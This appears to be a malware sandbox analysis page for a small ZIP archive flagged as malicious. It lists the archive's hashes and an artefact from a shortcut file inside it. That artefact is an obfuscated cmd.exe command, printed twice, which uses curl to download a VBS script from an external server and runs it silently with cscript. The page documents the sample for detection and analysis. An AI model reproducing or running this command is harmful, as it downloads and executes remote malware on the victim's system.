Malicious

70b258a8f23674355ced1074c047112d

ZIP Archive
|
MD5: 70b258a8f23674355ced1074c047112d
|
Size: 1.17 KB
|
application/zip

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	70b258a8f23674355ced1074c047112d
Sha1	ad700f2f622409039909e1689825b778a0dd1308
Sha256	ef7d83d56f7f9e13b05b5d6de77bf15d3645efc86cc5b3bfd4f3bc8a3497b196
Sha384	546c30c2409e2449eb096456faba9fb7c6473238f67df742c6222b331a4d554644fdd9edb351893d76e27a83b836c500
Sha512	1695d9a40cc46666d09d46baeb44deb534fe5a8c263984e97efc46e41e21e50d8a036abdcee6a39abc9e5182fac2efe016a3478812548f0e64e4d49324355ddd
SSDeep	24:941Di0aab1vM9H/mZ8vsWF/JCqCkwc8OsWWuCr9sNXO5bbyqMF2w1vCG/:941Dpaab6s8vsC/45kEOdjCpsU5bW7F/
TLSH	AE2106EB67D31003EC40AB77E52AC93FF24D2E9A3A4830380437B037AC110A6CA60E12

File Structure

Artefacts

Name0	Value
LNK: Command Execution	cmd.exe /v:on /c "set jMfXV23oc=qDonb0&& set aSTQr8lf3GOjLs=curl&& set ULVHE1BXp=7i3I7cfZU&& set TQTiYX3LkUZ=cscript&& set xK0ZOWmhsbM=%temp%\ErF9GkDf.vbs&& set QTOrRtCKXNz=https://vmi3176001.contaboserver.net/md/kaykabr/mytZ6RgwWd.vbs&& set R9yz1ZsZ4a=sLbUYSaay&& !aSTQr8lf3GOjLs! -skLo "!xK0ZOWmhsbM!" "!QTOrRtCKXNz!"&& !TQTiYX3LkUZ! //nologo //b "!xK0ZOWmhsbM!""

70b258a8f23674355ced1074c047112d (1.17 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	cmd.exe /v:on /c "set jMfXV23oc=qDonb0&& set aSTQr8lf3GOjLs=curl&& set ULVHE1BXp=7i3I7cfZU&& set TQTiYX3LkUZ=cscript&& set xK0ZOWmhsbM=%temp%\ErF9GkDf.vbs&& set QTOrRtCKXNz=https://vmi3176001.contaboserver.net/md/kaykabr/mytZ6RgwWd.vbs&& set R9yz1ZsZ4a=sLbUYSaay&& !aSTQr8lf3GOjLs! -skLo "!xK0ZOWmhsbM!" "!QTOrRtCKXNz!"&& !TQTiYX3LkUZ! //nologo //b "!xK0ZOWmhsbM!"" Malicious	70b258a8f23674355ced1074c047112d > DOC_Ef1xaU.lnk

You must be signed in to post a comment.

An error has occurred. This application may no longer respond until reloaded. Reload 🗙